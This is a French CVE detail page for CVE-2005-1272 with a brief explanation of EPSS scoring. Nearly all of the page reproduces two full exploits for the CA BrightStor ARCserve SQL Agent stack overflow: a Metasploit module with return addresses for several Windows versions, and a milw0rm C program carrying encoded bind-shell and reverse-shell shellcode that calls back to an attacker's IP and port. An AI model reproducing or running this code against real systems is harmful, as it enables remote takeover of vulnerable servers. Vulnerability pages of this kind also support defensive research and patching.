CVE-2005-1272 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # $Id: sql_agent.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow', 'Description' => %q{ This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2005-1272'], [ 'OSVDB', '18501' ], [ 'BID', '14453'], [ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'], [ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'], ], 'Privileged' => true, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ # This exploit requires a jmp esp for return ['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp ['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret ['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret # Generic jmp esp's ['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp ['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp ['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret ['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret ['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret ['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret ], 'DisclosureDate' => 'Aug 02 2005', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6070) ], self.class) end def exploit print_status("Trying target #{target.name}...") # The 'one line' request does not work against Windows 2003 1.upto(5) { |i| # Flush some memory connect begin sock.put("\xff" * 0x12000) sock.get_once rescue end disconnect # 3288 bytes max # 696 == good data (1228 bytes contiguous) @ 0293f5e0 # 3168 == return address # 3172 == esp @ 0293ff8c (2476 from good data) buf = rand_text_english(3288, payload_badchars) buf[ 696, payload.encoded.length ] = payload.encoded buf[3168, 4] = [target.ret].pack('V') # jmp esp buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476 connect begin sock.put(buf) sock.get_once rescue end handler disconnect } end end

/* * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe * * cybertronic[at]gmx[dot]net * */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define PORT 6070 unsigned char bindshell[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32" "\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a" "\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d" "\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc" "\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90" "\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b" "\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2" "\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2" "\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2" "\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2" "\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2" "\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2" "\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b" "\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4" "\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96" "\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2" "\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7" "\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d" "\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d" "\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0" "\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f" "\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2" "\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98" "\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94" "\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0" "\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4" "\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38" "\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1" "\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f" "\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90" "\x80\x2f\xa2\x04"; unsigned char reverseshell[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9" "\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3" "\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE" "\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99" "\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF" "\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6" "\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF" "\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD" "\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD" "\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD" "\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66" "\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66" "\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB" "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3" "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3" "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75" "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2" "\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0"; void exploit ( int s, unsigned long cbip, unsigned short cbport, int option ) { unsigned long pushesp = 0x20c0c1ab; char buffer[3289]; bzero ( &buffer, sizeof ( buffer ) ); memset ( buffer, 0x41, sizeof ( buffer ) - 1 ); memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 ); memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 ); if ( option == 0 ) { memcpy ( &reverseshell[111], &cbip, 4); memcpy ( &reverseshell[118], &cbport, 2); memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 ); } else memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 ); printf ( "attacking with %u bytes...", strlen ( buffer ) ); write ( s, buffer, strlen ( buffer ) ); printf ( "done!\n" ); close ( s ); } int main ( int argc, char* argv[] ) { int s; unsigned long cbip; unsigned short cbport; struct sockaddr_in remote_addr; struct hostent* host_addr; if ( argc != 2 ) if ( argc != 4 ) { fprintf ( stderr, "Usage\n-----\n[bindshell] %s <ip>\n[reverseshell] %s <ip> <cbip> <cbport>\n", argv[0], argv[0] ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); s = socket ( AF_INET, SOCK_STREAM, 0 ); printf ( "connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( "ok!\n" ); if ( argc == 4 ) { cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999; cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999; exploit ( s, cbip, cbport, 0 ); } else exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ); } // milw0rm.com [2005-08-03]